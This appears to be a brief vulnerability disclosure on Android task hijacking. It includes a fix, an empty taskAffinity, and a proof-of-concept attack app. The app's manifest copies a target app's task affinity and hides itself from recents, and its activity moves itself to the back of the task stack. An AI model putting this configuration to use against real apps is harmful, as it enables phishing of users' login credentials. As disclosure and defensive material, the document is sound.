Task hijacking allows malicious apps to inherit permissions of vulnerable apps and is usually used for phishing login credentials of victims.
This vulnerability applies to all Android versions before Android 11.
To prevent this attack you will need to set taskAffinity property of the application activities to taskAffinity= “” in the <activity> tag of
the AndroidManifest.xml to force the activities to use a randomly generated task affinity, or set it at the <application> tag to enforce on all activities in the application.
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:tools="http://schemas.android.com/tools"
package="com.m0ck3d.taskhijackingattackapp"
tools:ignore="ExtraText">
<application
android:allowBackup="true"
android:icon="@drawable/daverage"
android:label="AttackAppTaskHijacking"
android:roundIcon="@drawable/daverage"
android:supportsRtl="true"
android:theme="@style/Theme.Taskhijackingattackapp"
android:taskAffinity="app.simple.inure">
<activity
android:name=".MainActivity" android:launchMode="singleTask" android:excludeFromRecents="true"
android:exported="true">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
</manifest>
import android.os.Bundle
import android.content.Intent;
import androidx.appcompat.app.AppCompatActivity
class MainActivity : AppCompatActivity() {
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
moveTaskToBack(true);
}
override fun onResume() {
super.onResume()
setContentView(R.layout.activity_main)
}
}